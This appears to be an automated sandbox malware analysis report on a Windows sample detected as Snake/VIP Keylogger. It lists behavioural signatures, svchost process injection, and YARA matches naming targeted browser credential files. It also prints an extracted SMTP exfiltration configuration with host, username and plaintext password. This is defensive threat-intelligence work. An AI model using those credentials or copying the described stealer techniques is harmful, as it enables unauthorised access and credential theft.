Edit tour

Windows Analysis Report
8JVG9KELay.exe

Overview

General Information

Sample name:	8JVG9KELay.exe renamed because original name is a hash value
Original sample name:	747c95576cb6f5f8b27ebb2c5d77f9db0e1d32963b077239eb9e81a0a27dee62.exe
Analysis ID:	1631765
MD5:	6e06385b8e29f2c4a2de4384d23c630d
SHA1:	aeae8e5ba9e57d89a7a9572e91bbe65583a8c704
SHA256:	747c95576cb6f5f8b27ebb2c5d77f9db0e1d32963b077239eb9e81a0a27dee62
Tags:	exeRedLineStealeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

Binary is likely a compiled AutoIt script file

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Sample uses string decryption to hide its real strings

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

8JVG9KELay.exe (PID: 8404 cmdline: "C:\Users\user\Desktop\8JVG9KELay.exe" MD5: 6E06385B8E29F2C4A2DE4384D23C630D)

svchost.exe (PID: 8432 cmdline: "C:\Users\user\Desktop\8JVG9KELay.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "nykenyer@nykenyer.hu", "Password": "VC0wEHu9F4", "Host": "mail.nykenyer.hu", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "nykenyer@nykenyer.hu", "Password": "VC0wEHu9F4", "Host": "mail.nykenyer.hu", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1326810338.0000000000D70000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F1 88 44 24 2B 88 44 24 2F B0 90 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000001.00000002.3766303344.0000000005B51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35981:$a1: get_encryptedPassword 0x35955:$a2: get_encryptedUsername 0x35a19:$a3: get_timePasswordChanged 0x35931:$a4: get_passwordField 0x35997:$a5: set_encryptedPassword 0x35764:$a7: get_logins 0x31081:$a10: KeyLoggerEventArgs 0x31050:$a11: KeyLoggerEventArgsEventHandler 0x35838:$a13: _encryptedPassword
00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f6cc:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ed6f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3efcc:$a4: \Orbitum\User Data\Default\Login Data 0x3f9ab:$a5: \Kometa\User Data\Default\Login Data
00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33504:$s1: UnHook 0x334a0:$s2: SetHook 0x334d9:$s3: CallNextHook 0x33468:$s4: _hook
00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35981:$a1: get_encryptedPassword 0x35955:$a2: get_encryptedUsername 0x35a19:$a3: get_timePasswordChanged 0x35931:$a4: get_passwordField 0x35997:$a5: set_encryptedPassword 0x35764:$a7: get_logins 0x31081:$a10: KeyLoggerEventArgs 0x31050:$a11: KeyLoggerEventArgsEventHandler 0x35838:$a13: _encryptedPassword
00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f6cc:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ed6f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3efcc:$a4: \Orbitum\User Data\Default\Login Data 0x3f9ab:$a5: \Kometa\User Data\Default\Login Data
00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33504:$s1: UnHook 0x334a0:$s2: SetHook 0x334d9:$s3: CallNextHook 0x33468:$s4: _hook
00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3598f:$a1: get_encryptedPassword 0x35963:$a2: get_encryptedUsername 0x35a27:$a3: get_timePasswordChanged 0x3593f:$a4: get_passwordField 0x359a5:$a5: set_encryptedPassword 0x35772:$a7: get_logins 0x3108f:$a10: KeyLoggerEventArgs 0x3105e:$a11: KeyLoggerEventArgsEventHandler 0x35846:$a13: _encryptedPassword
00000001.00000002.3764565909.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 F1 88 44 24 2B 88 44 24 2F B0 90 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34a61:$a1: get_encryptedPassword 0x34a35:$a2: get_encryptedUsername 0x34af9:$a3: get_timePasswordChanged 0x34a11:$a4: get_passwordField 0x34a77:$a5: set_encryptedPassword 0x34844:$a7: get_logins 0x30161:$a10: KeyLoggerEventArgs 0x30130:$a11: KeyLoggerEventArgsEventHandler 0x34918:$a13: _encryptedPassword
00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e7ac:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3de4f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e0ac:$a4: \Orbitum\User Data\Default\Login Data 0x3ea8b:$a5: \Kometa\User Data\Default\Login Data
00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x325e4:$s1: UnHook 0x32580:$s2: SetHook 0x325b9:$s3: CallNextHook 0x32548:$s4: _hook
Process Memory Space: svchost.exe PID: 8432	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: svchost.exe PID: 8432	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: svchost.exe PID: 8432	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: svchost.exe PID: 8432	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x4a7f8:$a1: get_encryptedPassword 0xba956:$a1: get_encryptedPassword 0xfad02:$a1: get_encryptedPassword 0x4a7cc:$a2: get_encryptedUsername 0xba92a:$a2: get_encryptedUsername 0xfacd6:$a2: get_encryptedUsername 0x4a890:$a3: get_timePasswordChanged 0xba9ee:$a3: get_timePasswordChanged 0xfad9a:$a3: get_timePasswordChanged 0x4a7a8:$a4: get_passwordField 0xba906:$a4: get_passwordField 0xfacb2:$a4: get_passwordField 0x4a80e:$a5: set_encryptedPassword 0xba96c:$a5: set_encryptedPassword 0xfad18:$a5: set_encryptedPassword 0x4a5e4:$a7: get_logins 0xba742:$a7: get_logins 0xfaaee:$a7: get_logins 0x470a3:$a10: KeyLoggerEventArgs 0xb70ee:$a10: KeyLoggerEventArgs 0xf75ad:$a10: KeyLoggerEventArgs
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.8JVG9KELay.exe.d70000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F1 88 44 24 2B 88 44 24 2F B0 90 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
1.2.svchost.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F1 88 44 24 2B 88 44 24 2F B0 90 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
1.3.svchost.exe.346d000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.3.svchost.exe.346d000.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.3.svchost.exe.346d000.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.3.svchost.exe.346d000.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35981:$a1: get_encryptedPassword 0x35955:$a2: get_encryptedUsername 0x35a19:$a3: get_timePasswordChanged 0x35931:$a4: get_passwordField 0x35997:$a5: set_encryptedPassword 0x35764:$a7: get_logins 0x31081:$a10: KeyLoggerEventArgs 0x31050:$a11: KeyLoggerEventArgsEventHandler 0x35838:$a13: _encryptedPassword
1.3.svchost.exe.346d000.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f6cc:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ed6f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3efcc:$a4: \Orbitum\User Data\Default\Login Data 0x3f9ab:$a5: \Kometa\User Data\Default\Login Data
1.3.svchost.exe.346d000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33504:$s1: UnHook 0x334a0:$s2: SetHook 0x334d9:$s3: CallNextHook 0x33468:$s4: _hook
1.2.svchost.exe.3574f2e.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.svchost.exe.5970000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.svchost.exe.5970000.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.svchost.exe.5970000.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.svchost.exe.5970000.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35981:$a1: get_encryptedPassword 0x35955:$a2: get_encryptedUsername 0x35a19:$a3: get_timePasswordChanged 0x35931:$a4: get_passwordField 0x35997:$a5: set_encryptedPassword 0x35764:$a7: get_logins 0x31081:$a10: KeyLoggerEventArgs 0x31050:$a11: KeyLoggerEventArgsEventHandler 0x35838:$a13: _encryptedPassword
1.2.svchost.exe.5970000.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f6cc:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ed6f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3efcc:$a4: \Orbitum\User Data\Default\Login Data 0x3f9ab:$a5: \Kometa\User Data\Default\Login Data
1.2.svchost.exe.5970000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33504:$s1: UnHook 0x334a0:$s2: SetHook 0x334d9:$s3: CallNextHook 0x33468:$s4: _hook
1.3.svchost.exe.346df20.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.3.svchost.exe.346df20.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.3.svchost.exe.346df20.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.3.svchost.exe.346df20.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x32e61:$a1: get_encryptedPassword 0x32e35:$a2: get_encryptedUsername 0x32ef9:$a3: get_timePasswordChanged 0x32e11:$a4: get_passwordField 0x32e77:$a5: set_encryptedPassword 0x32c44:$a7: get_logins 0x2e561:$a10: KeyLoggerEventArgs 0x2e530:$a11: KeyLoggerEventArgsEventHandler 0x32d18:$a13: _encryptedPassword
1.3.svchost.exe.346df20.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3cbac:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c24f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c4ac:$a4: \Orbitum\User Data\Default\Login Data 0x3ce8b:$a5: \Kometa\User Data\Default\Login Data
1.2.svchost.exe.7eb0000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.svchost.exe.7eb0000.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.svchost.exe.7eb0000.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.svchost.exe.7eb0000.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x32e61:$a1: get_encryptedPassword 0x32e35:$a2: get_encryptedUsername 0x32ef9:$a3: get_timePasswordChanged 0x32e11:$a4: get_passwordField 0x32e77:$a5: set_encryptedPassword 0x32c44:$a7: get_logins 0x2e561:$a10: KeyLoggerEventArgs 0x2e530:$a11: KeyLoggerEventArgsEventHandler 0x32d18:$a13: _encryptedPassword
1.2.svchost.exe.7eb0000.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3cbac:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c24f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c4ac:$a4: \Orbitum\User Data\Default\Login Data 0x3ce8b:$a5: \Kometa\User Data\Default\Login Data
1.2.svchost.exe.7eb0000.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x309e4:$s1: UnHook 0x30980:$s2: SetHook 0x309b9:$s3: CallNextHook 0x30948:$s4: _hook
1.3.svchost.exe.346d000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.3.svchost.exe.346d000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.3.svchost.exe.346d000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.3.svchost.exe.346d000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33b81:$a1: get_encryptedPassword 0x33b55:$a2: get_encryptedUsername 0x33c19:$a3: get_timePasswordChanged 0x33b31:$a4: get_passwordField 0x33b97:$a5: set_encryptedPassword 0x33964:$a7: get_logins 0x2f281:$a10: KeyLoggerEventArgs 0x2f250:$a11: KeyLoggerEventArgsEventHandler 0x33a38:$a13: _encryptedPassword
1.3.svchost.exe.346d000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d8cc:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cf6f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d1cc:$a4: \Orbitum\User Data\Default\Login Data 0x3dbab:$a5: \Kometa\User Data\Default\Login Data
1.3.svchost.exe.346d000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31704:$s1: UnHook 0x316a0:$s2: SetHook 0x316d9:$s3: CallNextHook 0x31668:$s4: _hook
1.3.svchost.exe.346df20.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x309e4:$s1: UnHook 0x30980:$s2: SetHook 0x309b9:$s3: CallNextHook 0x30948:$s4: _hook
1.2.svchost.exe.3574f2e.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.svchost.exe.3574f2e.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.svchost.exe.3574f2e.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x32e61:$a1: get_encryptedPassword 0x32e35:$a2: get_encryptedUsername 0x32ef9:$a3: get_timePasswordChanged 0x32e11:$a4: get_passwordField 0x32e77:$a5: set_encryptedPassword 0x32c44:$a7: get_logins 0x2e561:$a10: KeyLoggerEventArgs 0x2e530:$a11: KeyLoggerEventArgsEventHandler 0x32d18:$a13: _encryptedPassword
1.2.svchost.exe.3574f2e.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3cbac:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c24f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c4ac:$a4: \Orbitum\User Data\Default\Login Data 0x3ce8b:$a5: \Kometa\User Data\Default\Login Data
1.2.svchost.exe.3574f2e.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x309e4:$s1: UnHook 0x30980:$s2: SetHook 0x309b9:$s3: CallNextHook 0x30948:$s4: _hook
1.2.svchost.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 F1 88 44 24 2B 88 44 24 2F B0 90 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
1.2.svchost.exe.7eb0000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.svchost.exe.7eb0000.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.svchost.exe.7eb0000.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.svchost.exe.7eb0000.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34a61:$a1: get_encryptedPassword 0x34a35:$a2: get_encryptedUsername 0x34af9:$a3: get_timePasswordChanged 0x34a11:$a4: get_passwordField 0x34a77:$a5: set_encryptedPassword 0x34844:$a7: get_logins 0x30161:$a10: KeyLoggerEventArgs 0x30130:$a11: KeyLoggerEventArgsEventHandler 0x34918:$a13: _encryptedPassword
1.2.svchost.exe.7eb0000.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e7ac:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3de4f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e0ac:$a4: \Orbitum\User Data\Default\Login Data 0x3ea8b:$a5: \Kometa\User Data\Default\Login Data
1.2.svchost.exe.7eb0000.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x325e4:$s1: UnHook 0x32580:$s2: SetHook 0x325b9:$s3: CallNextHook 0x32548:$s4: _hook
1.2.svchost.exe.5970f20.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.svchost.exe.5970f20.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.svchost.exe.5970f20.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.svchost.exe.5970f20.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x32e61:$a1: get_encryptedPassword 0x32e35:$a2: get_encryptedUsername 0x32ef9:$a3: get_timePasswordChanged 0x32e11:$a4: get_passwordField 0x32e77:$a5: set_encryptedPassword 0x32c44:$a7: get_logins 0x2e561:$a10: KeyLoggerEventArgs 0x2e530:$a11: KeyLoggerEventArgsEventHandler 0x32d18:$a13: _encryptedPassword
1.2.svchost.exe.5970f20.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3cbac:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c24f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c4ac:$a4: \Orbitum\User Data\Default\Login Data 0x3ce8b:$a5: \Kometa\User Data\Default\Login Data
1.2.svchost.exe.5970f20.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x309e4:$s1: UnHook 0x30980:$s2: SetHook 0x309b9:$s3: CallNextHook 0x30948:$s4: _hook
1.2.svchost.exe.5970f20.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.svchost.exe.5970f20.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
